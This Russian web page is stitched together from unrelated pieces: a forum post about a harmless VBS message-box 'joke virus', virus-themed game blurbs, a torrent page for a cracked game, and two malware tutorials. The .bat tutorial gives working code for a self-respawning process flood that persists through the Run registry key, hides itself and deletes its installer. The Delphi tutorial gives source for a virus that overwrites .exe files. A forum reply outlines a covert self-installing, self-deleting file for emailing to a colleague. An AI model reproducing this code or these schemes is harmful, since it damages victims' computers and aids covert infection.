Юпи создай свой вируса
Здравствуйте! В этом посте (первом) я покажу, как создавать вирус шутку через блокнот. Сразу прошу не бомбить и не писать гневные комменты типа: "Да такого миллион!", "Да что ты знаешь!", "Да пошел ты в жопу!" и т.д. Да, я знаю, что эти "вирусы" создавали давно. Но я к примеру открыл для себя это совсем недавно. Месяца 3 назад.
Ближе к делу: я буду рассказывать что эта шутка вообще делает, буду вставлять скрины и все объяснять. Напомню, это ознакомительный пост! В других постах я буду конкретно писать, как создать такой-то вирус.
Вирус-шутка это программа, которую создают в блокноте. Т.е. пишешь там команды и сохраняешь их определенных форматах. Если все правильно сделано, без ошибок, то вирус-шутка сработает. Кстати, "вирус-шутка" это условное название. В блокноте можно создать и игру, и крестики нолики, часы.
ПРЕДУПРЕЖДЕНИЕ. Перед созданием вируса отключите Анти-Вирус.
1) Создание вируса: Для начала откройте блокнот.
2) В блокноте начинайте писать команду. Для начала скопируйте этот текст туда:
msgbox"Ты не против, если я буду жить у тебя в компе?",32+4,"Вопрос"
msgbox"Ок, ты не против",64,"Я понял"
msgbox"Ок, ты не против",64,"Я понял"
msgbox"Это шутка, это НЕ вирус :) ХАХАХАХА",64,"Я пошутил"
msgbox"Или же нет. ",64,". "
Я НЕ ЖЕЛАЮ ВАМ ЗЛА! ЭТОТ ВИРУС НЕ МОЖЕТ ПРИНЕСТИ ВАМ И ВАШЕМУ КОМПУ ВРЕДА!
3) Сохраните ваш текст в формате .vbs Смотрите далее.
4) Теперь у вас на Рабочем столе должен появиться вот такой значок:
5) Заходите в него.
6) У вас должен открыться вирус-шутка. Если же не работает, то два варианта: либо у вас включен Анти-Вирус, либо ваш комп не поддерживает это.
7) НЕ ПУГАЙТЕСЬ! ВИРУС-ШУТКА НЕ ПРИНЕСЕТ ВРЕДА. Теперь вам осталось читать то, что там написано, и кликать по кнопкам (любым).
Вы можете изменить в команде вируса текст. Например вместо "Windows удалить?" можно написать "ставьте лайки!". Удачи вам, экспериментируйте со своими вирусами!
И так, как я обещал, это был ознакомительный пост. Вскоре я выложу пост, где подробно опишу все значения, как все делать и т.д. Отпишитесь в тапках как вам мой пост, киньте скрины своего вируса. Мне будет интересно :D
сука! у меня винда удалилась!
Не ври. Этот вирус-шутка и близко такого сделать не может.
ТС, у вас тоже снегопад? Занятия в школах отменили?
Да, отменили. Вот и сижу, "клавотюкаюсь".
Мне хочется узнать все подробно как это работает что обозначает msgbox, цифры 64; 32+4
"msgbox" - название команды, которая выводит стандартный диалог. Цифрами выбирается стиль отображения (иконка внутри диалога и воспроизводимый звук при открытии). Также стилем выбираются кнопки (их текст и количество)
Отображаемых иконок всего 4: ошибка, вопрос, восклицание и внимание. Столько-же звуков.
Кнопок в связке по более:
Ок
Ок, Отмена
Да, Нет
Да, Нет, Отмена
Повтор, Отмена
Пропустить, Повторить Отменить
Т.к. эти диалоги выдаются системой, то можно указать только заголовок и текст диалога. Свой текст кнопок или свою иконку Вы не сможете установить. Можно вывести диалог без иконки. Вроде ничего не забыл. Давно увлекался этим, потом перешел на норм. язык программирования.
Ой, а может поможете раз разбираетесь?
Хочу коллегу разыграть/ поздравить с днем рождения. Он в командировке сейчас. Хочу ему на почту файл бросить который в определенный день ему на принтер выведет поздравление. Как можно батник сделать, чтобы он себя в автозагрузку прописал и именно в определенный день сработал? Ну и удалился потом, чтоб он не догадался.
В инете поискал, там только на удаление доков батники) и определенного дня нельзя поставить.
Если хотите именно батник, то можно попробовать использовать планировщик Windows, но с батниками куча ограничений.
О поздравлялке: даже если Вы отправите эл. письмо с батником или exe-шником, то поздравление не сработает, пока его не скачают и не запустят. В некоторых случаях почтовый сервис может отправить письмо в папку "Спам" (пользователь его не увидит), либо при скачивании файл заблокирует антивирус, но это все маловероятно.
На счет печати принтером: это можно, но обязательно? Можно например вывести на экран красивый диалог, или картинку :)
Нет с программкой не тот эффект))) Да и вк нету.
Просто хотелось отправить на почту письмо, (его обязательно откроют, так как с этого адреса только по работе приходит, да и с чувством опасности у людей проблемы))), чтоб этот файл прописался в планировщик или в автозагрузку, а в нужный день отправил бы на печать текст. Там принтер ежедневно включают, так что по-любому бы удивил)))
Я батники когда-то давно делал. Даже похожий прикол видел, когда из планировщика каждый день на печать выходит "Ты умрешь через *** дней", "Ты умрешь завтра", "Это случится сегодня". Но там надо было за компом посидеть, чтоб настроить. А как это "дистанционно" через почту сделать я не знаю.
В любом случае спасибо.
Хм, думаю, что через батник хоть и сложно, но реально: батник запускает установщик Windows (msiexec.exe) с параметром, который скачает и установит программу и документ с текстом печати. Программа прописывается в автозапуск и следит за датой и временем системы. Как только дата начала наступает, программа запускает скрытый процесс Microsoft Office Word (winword.exe) с параметром начала печати нашего документа. Программа делает какую-нибудь отметку на каком-либо ресурсе (сайте или сервере), что она успешно отработала. Запускается msiexec.exe с параметром удаления нашей программы (программа удаляется с компьютера).
Несколько вопросов:
- на компьютере есть MS Office Word? Иначе придется создавать документ формата .rtf (поддерживается системой без доп. софта)
- проще изначально в письме использовать не батник, а именно приложение (exe-файл, т.к. не придется сначала создавать, а после скачивать установщик). Если нужно, то предоставлю исходный код приложения. Язык программирования - AutoIt 3. Его синтаксис очень напоминает рассматриваемые в посте скрипты. Так может лучше обойтись без батника?
- нужны дата запуска печати документа и текст поздравления
- желательно заранее знать, какая операционная система установлена на компьютере, где будет выполняться "поздравлялка" (XP, Vista, 7, 8, 8.1, 10 или серверные редакции систем Windows)?
Очередная игрушка про зомби, но с весьма интересным и захватывающим сюжетом. В мире уже давно не осталось добра, все вокруг бояться и бегут
Распространения болезни по всему миру. Симптомы модернизация и сопротивления, как вы пытаетесь заразить всех людей. Это веселая образователь
Игра представляет собой 3D симулятор, который переносит вас в недалекое будущее. Там, человечество оказалось на грани вымирание, вирус, созд
В игре "Никелодеон: День Опасности", вы превратитесь в юного героя, которому не страшны никакие приключения. Опасный Малый вместе с Капитано
Предупреждение! Ближайшие вирус. Уничтожить их с пальца! Вирус будет сильнее с каждым уровнем, и вам нужно, чтобы обновить ваш корабль и ору
В игре "Миссия Зомби 3" вас ждут головокружительные приключения вместе с отважными братом и сестрой. Юные герои отправились в секретную воен
Вы играете роль вирусов Спасителя, которые намеренно вводят в Covid - 19 пациента, чтобы бороться против Короны вирусы и убить их. Ваша цель
В бесплатной онлайн игре "Пандемия 2" у вас будет злобная миссия - уничтожение человечества с лица земли. Ведь в ваших руках мощное оружие -
В игре "Арена: Вспышка Зомби" мир захлестнул страшный вирус. За считанные дни он превратил почти всё население планеты в кровожадных монстро
Один из выживших находится в безопасности за стенами, возможно, он сможет найти лекарство от зомби-Апокалипсиса, попробовать 6 образцов (уро
"Битва микробов" - это игра, рассказывающая о эволюции микроорганизмов, которые, как и другие организмы в природе, пытаются выжить, поедая д
Забавная игра, в которой вам придется избавиться от вируса быстро с вакциной перед побеждает вирус. Собирать очки исследований, чтобы улучши
Смелый Пикачу выступит в сражении против вирусов, в бесплатной игре "Пикачу против вирусов". Оказавшись в джунглях, покемон обнаружил опасны
Эта игра просто увлекательный симулятор вирусной инфекции смертельного-то "Корона" и вирус по всему миру. Ваша игровая цель-зарази
"Соедини паразитов" - бесплатная онлайн игра, которую мы точно не советуем брезгливым людям, так как весь геймплей здесь связан с паразитами
В продолжении флеш игры "Инфектонатор!2" у вас есть возможность заражать опасным вирусом целые континенты! Уровень вашего коварства растет,
Всегда хотел запустить свое собственное тайное общество. В этой игре вы можете это сделать. Сражаться или погибнуть, бороться или скрыват
"Агарио: Чашка Петри" - простая, но быстро завлекающая браузерная игра, из жанра Ио. Множество разных режимов и возможностей для игры, в кот
Проблемы с животом здорово усложняют нашу жизнь. Этот дискомфорт влияет на общее настроение в целом, поэтому важно лечить вовремя возникшие
Зомби снова проснулись! Они несут смерть и разрушения всему, что станет на их пути. Вы должны защитить человечество от этой напасти.
Неугомонные паразиты вернулись более голодными и готовыми атаковать новые человеческие органы, в необычной онлайн игре "Соединенные паразиты
Джуди Хоппс из мультфильма "Зверополис" простудила горло, пока гналась за преступниками. Теперь ей нужна ваша помощь и в онлайн игре "Джуди
Присоединяйтесь в онлайн игру "Вирусная война", где вам предстоит побороться с вирусами, используя специальное оружие.В игре вам нужно будет
Эпидемия: История Хаоса - это бродилка онлайн, с качественной графикой и увлекательным геймплеем. Здесь вы будете играть в роли злодея, докт
"Вирус - начало конца" - Бесплатная игра, где надо попробовать дойти до конца. В 2017 биологический несчастный случай привел к выпуску смер
Национальная безопасность под угрозой. В лабораторию Техасского университета обнаружили смертельный вирус под названием Гуанорито. Вас пригл
Заразите людей, чтобы сделать их зомби. Используйте свою вирусную энергично, чтобы распространить вирус быстро. У каждой стадии есть необход
Предотвратите проникновение опасного вируса в ваш город, в онлайн игре "Свиной Грипп". Вам нужно остановить вся и всех, кто появляется на ва
После неудачного лабороторного эксперемента по галактике распостранился страшный вирус. Помогите доктору Зеду спасти галактику.
Расти вирус, который распространяется на борт, прежде чем запускать из ходов. клеток глаза в вашем распоряжении. После выбора цвета с помощь
Это эпизод для продолжения моей глупой серии игр про злоключения мертвецов.
Сумасшедший ученый поместил Вас, вирус радуги, в клетку в космосе, чтобы проверить Вашу адаптируемость. Выживите, пока Вы можете outleveling
Увлекательная РПГ игра ждет вас!
Вы должны устранить вирусы посредством квалифицированного использования правильных таблеток. Подобный старому классику Нинтендо "доктор Mari
Земли Ооо вновь потерпели угрозу в виде опасного вируса. Если остальным жителям повезло не столкнуться с этим заболеванием, то Бетти - подру
Поэтому часто они находят новые вирусы. Пора покончить с ними! Вырезанные фрагменты на экране, уворачиваясь от всевозможных вирусов. Подумай
Иностранное судно поставлено в док земным шаттлом, содержащим CY10 продвинутый гуманоидный киборг, который недавно был в контакте с теми на
У нас есть основанная на RPG истребителе игра, в которой вы сражаетесь тактически. Прояви характер, достойный настоящего мужчины! Спаси мир
Ваша задача соединить три цвета, чтобы уничтожить вирусы. Удачи!
Как создать простой .bat вирус?
Создание самых простых вирусов не требует наличия специальных сред для разработки программ. И особых знаний, кстати, тоже. Создать вирусы довольно просто, если использовать для этого командную строку. Для этого нужно немного знать синтаксис командной строки и уметь создавать .bat-файлы.
Если очень поверхностно, то это файлы с расширением .bat. Такие файлы несут в себе команды, которые должны быть выполнены командным интерпретатором Windows. Все те команды, которые можно выполнить в окне командной строки, можно вписать в .bat-файл и запустить. Результат будет одинаковым.
Чтобы создать .bat-вирус, нам нужен обычный текстовый редактор. В идеале подойдет для этих целей Блокнот. Создав и открыв новый текстовый документ, Вам нужно вписать туда тот код(команды), которые он должен выполнить. После этого, Вам нужно с помощью меню Сохранить как сохранить этот файл, задав ему какое-либо имя с расширением .bat и указав тип файла Все файлы.
В данной статье мы рассмотрим создание вируса, который после своего запуска будет бесконечно открывать окно командной строки. Бесконечно и очень быстро открывающиеся окна командной строки не дадут пользователю спокойно работать. Закрыть их всех не успеет никто и очень скоро они забьют оперативную память компьютера, что в свою очередь сильно затормозит работу компьютера, вплоть до полного зависания. Выглядеть это будет приблизительно так:
Вдобавок, мы закинем наш вирус в автозагрузку, что обеспечит автоматический запуск вируса вместе с операционной системой.
Сколько программистов, столько разных решений можно придумать для каждой задачи. Я приведу один из своих методов решения такой задачи.
[code]md c:\papka
echo start c:\papka\virus.bat>c:\papka\virus.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat
attrib +r +h +s c:\papka
attrib +r +h +s c:\papka\virus.bat
start c:\papka\virus.bat
del %0[/code]
А теперь разберем сам код. Первая строчка создает папку с именем papka в корне диска C:/. Такой адрес приведен только для примера. Использование же корня папки C:/ не совсем хороший вариант для вируса. Если Вы хотите обеспечить хорошую выживаемость Вашему вирусу, лучше всего спрятать его подальше. Первую команду можно даже пропустить, если Вы закинете сам вирус в уже созданную директорию.
Вторая строчка создает файл c:\papka\virus.bat и, с помощью команды echo, вписывает в него команду start c:\papka\virus.bat. Тут нужно знать, что после знака > указывается место вывода приведенной команды. Тут Вам нужно познакомится: c:\papka\virus.bat и есть основное тело вируса. Созданный нами .bat-файл с кодом, который мы сейчас разбираем, является всего лишь установщиком нашего основного вируса. Вы можете использовать другое название и другое местоположение для вируса.
Третья строчка закидывает созданный нами во второй строчке тело вируса в автозагрузку. Для этого используется пользовательская ветка реестра, так как к ней у пользователя всегда есть доступ. А вот использовать автозагрузку компьютера не безопасно, так как пользователь может не иметь административного доступа, что вызовет ненужную ошибку.
Четвертая и пятая строка кода изменяют атрибуты вируса и папки, где хранится вирус. Данными командами, а для этого используется команда attrib, мы добавляем атрибуты Только чтение, Скрытый и Системный и для папки, и для вируса. Использование атрибута r(Только чтение) необязательно. А вот атрибуты Скрытый и Системный хорошо защитят созданный нами вирус. Если не верите, то почитайте статью про вирус, который превращает папки на флешке в ярлыки. Он использует именно эту технологию.
6-ая строчка кода запускает наш вирус. Вы можете пропустить этот пункт, если хотите, чтобы первый запуск вируса произошел только после перезагрузки компьютера.
И, наконец-то, последняя, 7-ая строчка удаляет данный .bat-вирус. Это полезно, так как по этому .bat-файлу можно спокойно выйти на созданный нами вирус и удалить его.
Смысл вируса, который уместился в эти 7 строк — создать основной вирус, защитить его и обеспечить его постоянную работу. А так же подмести свои следы. А что делает основной вирус? После запуска основного вируса, он выполняет ту команду, которая вписана в нее. А это команда, в свою очередь, запускает наш вирус, который опять-таки снова запускает самого себя. И так до бесконечности.
Во-первых, начало борьбы с данным вирусом начнется после того, как он запуститься. Очень скоро вирус заполнит своими копиями оперативную память и Вы даже мышкой шевельнуть не сможете. Поэтому, такой спектакль нужно пресекать сразу. Для этого прекрасно подойдет кнопка Break на клавиатуре. Жмите ее столько, сколько понадобится, чтобы новые копии перестали создаваться. На клавиатурах без кнопки Break, может помочь сочетание клавиш Ctrl+C.
Вы можете найти и удалить вирус через его запись в автозагрузке(подробнее по ссылке). А так же Вы можете выйти на вирус по команде, которая будет высвечиваться в окне командного интерпретатора. Естественно, если Вы сможете добраться до скрытого и системного файла. Вот таким образом происходит создание простого вируса.
- Издатель: Ndemic Creations
- Разработчик: Ndemic Creations
- Год выхода: 2016
- Категория:Стратегии / Игры на русском
- Язык интерфейса: Русский, Английский
- Язык озвучки: отсутствует/не требуется
- Субтитры: Русский, Английский
- Таблетка: Присутствует (PLAZA)
Данный новый игровой проект поражает своим необычным игровым процессом. Теперь вы станете в игре настоящим разносчиком опасного вируса, и вы должны заразить как можно больше людей на нашей огромной планете. Игра сочетает в себе жанр стратегии и симулятора одновременно. Так что скачать Plague Inc: Evolved через торрент вы можете абсолютно бесплатно с нашего игрового портала.
Сюжет
По сюжету этой игры вы должны выбрать себе опасный и смертоносный вирус и начать заражать им как можно больше пациентов и людей из разных точек земного шара. Перед вами – огромная карта, которой вы обязательно должны руководствоваться. Развивайте свой вирус, создавайте новые неизлечимые болезни, занимайтесь научными опытами и исследованиями, чтобы иметь возможность заразить как можно больше людей по всему свету. Вирусов в игре предостаточно, поэтому в самом начале игры вы должны изучить все возможные вирусы, а затем смело можете определять для себя свою собственную стратегию в игре. Очень захватывающее и уникальное зрелище ждет вас.
Геймплей
Итак, перед вами огромная карта и потенциальные места, куда можно направить ваш вирус. Сначала вы должны определиться с выбором. Вирусы в игре разнообразные, поэтому вы должны остановиться на самом простом. Потом можно выбирать более опасные вирусы и распространять из, заражая еще больше людей. Сначала пройдите режим обучения, чтобы потом вам были доступны еще большее количество опасных вирусных инфекций. Заразить все человечество – этот основная задача игры Plague Inc: Evolved, скачать торрент которой возможно бесплатно с нашего игрового портала игр. Распространение вируса в игре происходит постепенно. На карте вы увидите, как люди заражаются опасным и смертоносным вирусом – на карте обозначаться темные точки. Так что исследуйте новые болезни. А еще вы сами сможете создать в процессе игры свой новый и опасный вирус. Очень уникальный геймплей получился.
Интересные факты
Поскольку игра представляет собой жанр стратегии, вы сами сможете выбрать себе отдельный участок Земли и заразить его своим собственным опасным вирусом. Чтобы иметь возможность заражать более обширные игровые территории, вам как игроку нужно постараться набрать как можно большее количество бонусных и дополнительных очков. Тогда вы заразите всю планету! Очень оригинальный сюжет и много игровых инноваций- качайте и наслаждайтесь! Вы вправе сотворить свой опасный вирус. Классная и увлекательная игра ждет пользователей. Вирус уже распространяется.
Особенности Plague Inc Evolved
- Зарази или спаси мир. Вы не только сможете распространять опасные вирусные болезни по всему миру, вы также в кооперативном режиме сможете объединиться с другими пользователями, и попытаться остановить распространение страшной инфекции
- Создай свою болезнь. Как уже было сказано, вы сами сможете создать новую, необычную болезнь и попытаться распространить ее по всему свету.
- Графика. Игра выполнена в трехмерном изображении, поэтому вы сможете насладиться необычными локациями в игре.
- Статистические данные. Вы постоянно должны следить за инструкциями на карте, следить за уровнем болезней на планете, а можете просто искать противоядия, если не хотите загубить Землю.
- Интерфейс игры. Значительно улучшился интерфейс игрового процесса. Вы сами сможете в этом убедиться в процессе игры.
- Трансляции с улиц городов. Вы сможете увидеть, как ваш вирус эффективно распространяется в крупных городах, для этого вы увидите камеру, установленную на игровой карте.
- И еще много интересных нюансов ждут вас в этой игре.
На этой странице по кнопке ниже вы можете скачать Plague Inc Evolved через торрент бесплатно.
Скриншоты Plague Inc Evolved
Видео к игре Plague Inc Evolved
Системные требования Plague Inc Evolved
- Операционная система: Windows XP (SP3), Windows Vista, Windows 7, Windows 8, Windows 10
- Процессор: 2.0 GHz Dual Core
- Оперативная память: 1 гб
- Видеокарта: 512 МБ
- Звуковая карта: Звуковое устройство, совместимое с DirectX® 9.0с
- Свободное место на жестком диске: 800 Мб
Информация о торренте
Тип издания: RePack.
Версия игры: 1.17.4.
HLLO- High Level Language Overwrite. Такой вирус перезаписывает программу своим телом. Т.е.
программа уничтожается, а при попытке запуска программы пользователем- запускается вирус и "заражает" дальше.
HLLC- High Level Language Companion. Большинство таких вирусов от-носятся к седой древности (8-10 лет назад), когда у пользователей стоял ДОС и они были очень ленивы. Эти вирусы ищут файл, и не изменяя его, создают свою копию, но с расширением .COM. Если ленивый пользователь пишет в командной строке только имя файла, то первым ДОС ищет COM файл, запуская вирус, который сначала делает свое дело, а потом запускает ЕХЕ файл. Есть и другая модификация
HLLC - более современная (7 лет ;)): Вирус переименовывает файл, сохраняя имя, но меняя расширение- с ЕХЕ на, допустим, OBJ или MAP. Своим телом вирус замещает оригинальный файл. Т.е. пользователь запускает вирус, который, проведя акт размножения, запускает нужную программу- все довольны.
HLLP- High Level Language Parasitic. Самые продвинутые. Приписывают свое тело к файлу спереди (Первым стартует вирус, затем он восстанавливает программу и запускает ее) или сзади
- тогда в заголовок проги мы пишем jmp near на тело вируса, все-таки запускаясь первыми.
Саму же программу мы можем оставить в неизменном виде, тогда это будет выглядеть так:
MZТело злобного вируса |
MZКод программы |
Что такое MZ, я думаю, ты догадался 🙂 Это же инициалы твоего любимого Марка Збиковски, которые он скромно определил в сигнатуру exe файла 🙂 А вписал я их сюда только для того, чтобы ты понЯл
- заражение происходит по принципу copy /b virus.exe program.exe, и никаких особых приколов тут нет. Сейчас нет. Но мы их с тобой нафигачим
- будь здоров :). Ну, например: можно первые 512 или больше байт оригинальной программы зашифровать любым известным тебе алгоритмом- XOR/XOR, NOT/NOT, ADD/SUB, тогда это будет выглядеть как:
MZтело злобного вируса |
XORed часть ориг. проги |
Неизменная часть ориг. проги |
В этом случае структура зараженного файла не будет так понятна.
Я не зря тут (в классификации, в смысле) так распинаюсь
- parasitic-алгоритм используют 90% современных вирусов, независимо от их способа распространения. Ладно, идем дальше:
Сетевой вирус. Может быть любым из перечисленных. Отличается тем, что его распространение не
ограничивается одним компом, эта зараза каким-либо способом лезет через инет или локальную сеть на другие машины. Я думаю, ты регулярно выносишь из мыльника 3-4 таких друга
- вот тебе пример сетевого вируса. А уж попав на чужой комп, он заражает файлы произвольным образом, или не заражает ВООБЩЕ.
Макро вирусы, скриптовые вирусы, IRC вирусы. В одну группу я определил их потому, что это вирусы, написанные на языках, встроенных в приложения (MSOffice :)), скриптах (тут рулит твой любимый VBS) и IRC скриптах. Строго говоря, как только в каком-то приложении появляется достаточно мощная (и/или дырявая) скриптовая компонента, на ней тут же начинают писать вирусы 😉 Кстати, макро вирусы очень просты и легко определяются эвристикой.
Дошли 🙂 Давай, запускай дельфи, убивай всякие окошки и вытирай из окна проекта всю чушь. То есть вообще все вытирай 🙂 Мы будем работать только с DPRом, содержащим:
program EVIL_VIRUS;
USES WINDOWS,SYSUTILS;
begin
end;
Логику вируса, я думаю, ты уже понял из классификации- восстанавливаем и запускаем прогу--> ждем завершения ее работы--> стираем "отработавший файл" (забыл сказать- мы НЕ ЛЕЧИМ зараженную прогу, мы переносим оригинальный код в левый файл и запускаем его. ПРИМЕР: Зараженный файл NOTEPAD.EXE. Создаем файл _NOTEPAD.EXE в том же каталоге с оригинальным кодом, и запускаем уже его).--> ищем незараженное файло и заражаем. Это все 🙂 Базовая конструкция вируса выглядит именно так.
Объяви теперь для своего могучего мозга следующие переменные и константы:
VaR VirBuf, ProgBuf, MyBuf : array of char;
SR : TSearchRec;
My,pr : File;
ProgSize,result : integer;
PN,st : String;
si : Tstartupinfo;
p :Tprocessinformation;
infected : boolean;
CONST VirLen: longint= 1000000;
Первой строчкой идут динамические массивы, в которые мы будем писать соответственно тело вируса и программы; В переменную SR запишутся
характеристики найденного файла-кандидата на заражение (надеюсь, ты знаком с процедурами FindFirst и FindNext, потому что дальше будет хуже ;)), My и
Pr - это файл, откуда мы стартовали и левый файл с оригинальным кодом программы (я про него уже писал выше). result- результат работы FindFirst, он должен быть равен нулю,
ProgSize - размер кода программы. Остальное ясно из дальнейшего, кроме
infected - это признак зараженности найденного файла и
VirLen- это длина кода вируса, ее ты узнаешь только после свадьбы. Тьфу, я хотел сказать, после компиляции. Т.е. компилируешь, меняешь значение константы в исходнике и перекомпилируешь.
Кодим далее 🙂 Здесь ты видишь код, ответственный за восстановление и запуск зараженной программы:
SetLength (virbuf,VirLen);
AssignFile (my,ParamStr(0));
st:= paramstr(0);
St:= st+#0;
CopyFile (@st[1],'c:\windows\program.exe',false);
IF FileSize (my)> VirLen then
begin
//Запуск программы
AssignFile (my,'c:\windows\program.exe);
Reset (my);
ProgSize:= FileSize(my)-VirLen;
BlockRead (my,virbuf,virlen);
SetLength (progbuf,pRogSize);
BlockRead (my,progbuf,progSize);
CloseFile (my);
PN:= '_'+ParamStr(0);
AssignFile (pr,PN);
ReWrite (pr);
BlockWrite (pr,progbuf,progSize);
CloseFile (pr);
FillChar( Si, SizeOf( Si ) , 0 );
with Si do
begin
cb := SizeOf( Si);
dwFlags := startf_UseShowWindow;
wShowWindow := 4;
end;
PN:= PN+#0;
Createprocess(nil,@PN[1],nil,nil,false,Create_default_error_mode,nil,nil,si,p);
Waitforsingleobject(p.hProcess,infinite);
//Запустили, программа отработала. Сотрем ее 🙂
ErAsE (pr);
Erase (my);
Тут все, в принципе просто и понятно, кроме того, зачем я перенес весь зараженный файл в каталог к виндам и что делают строчки с 3 по 5 включительно.
А сделал я это потому, что читать из запущенного файла некомфортно и возможно только с использованием CreateFile и ReadFile WinAPI. Про кодинг на WinAPI я расскажу позднее, сейчас я разберу только основы
- на Delphi.
Строчки эти - преобразование string в pchar народным методом, поскольку мы сейчас боремся за каждый байт кода. Еще момент: я поступил некорректно, задав путь c:\windows так жестко. Пользуйся лучше процедурой GetWindowsDirectory, узнай точно 🙂 Все остальное понятно без всяких комментариев (если нет
завязывай прогуливать информатику ;)), идем дальше:
result:= FindFirst ('*.exe',faAnyFile,sr);
WHILE Result= 0 DO
begin
//Проверка на вшивость
Infected:= false;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= '03.08.98 06:00:00' then infected:= true;
//Проверено!
IF (infected= false)and (sr.name<>paramstr(0)) then
begin
AssignFile (my,sr.Name);
ReWrite (my);
BlockWrite (my,virbuf,virlen);
BlockWrite (my,progbuf,sr.Size);
CloseFile (my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime ('03.08.98 06:00:00')));
end;
end;
//Если вир запущен "чистым", т.е. не из зараженной про-граммы, то завершаемся
end else halt;
Что же твой зоркий глаз видит тут? Правильно, процедура FindFirst ищет нам заданную жертву (любой exe файл из текущего каталога), передает его характеристики в переменную SR. Затем необходимо его проверить на зараженность. Это делается оригинально: при заражении файлу присваивается опр. дата и время. И любой файл с такими характеристиками считается зараженным. Все остальное опять же нецензурно просто, поэтому я плавно перехожу к заключению 🙂
Вот мы и накодили наш первый вирус. Пока он умеет только заражать файлы в текущем каталоге (хотя, я уверен, ты его легко модернизируешь ;)) и ничего не знает про другие каталоги и интернет. Не отчаивайся, мы его этому быстро обучим. Пока поиграйся с этими строчками, и жди следующей статьи.
Рискну дать тебе описание всех процедур, использованных в статье. Это поможет тебе искать их в хелпе и подготовиться к кодингу серьезных вирусов с использованием
WinAPI.
AssignFile - в WinAPI нет аналога - сопоставляет файл
с переменной типа File или TextFile
Reset - аналоги _lopen и CreateFile - открывает
существующий файл и устанавливает позицию
чтения в начало
ReWrite - _lcreate и CreateFile - создает новый файл и
уст. позицию чтения в начало. Если скормить
ReWrite существующий файл, его содержимое
будет обнулено
BlockRead - _lread и ReadFile - читает в буфер
определенное количество данных из файла
BlockWrite - _lwrite и WriteFile - соответственно, пишет
данные в файл
SeekFile - _llseek и SetFilePointer - перемещает позицию
чтения/записи в открытом файле
CloseFile - _lclose и CloseHandle - закрывает открытый
файл
Erase - DeleteFile - удаление файла
FindFirst - FindFirstFile - поиск файла по критериям
FindNext - FindNextFile - поиск следующего файла
Читайте также: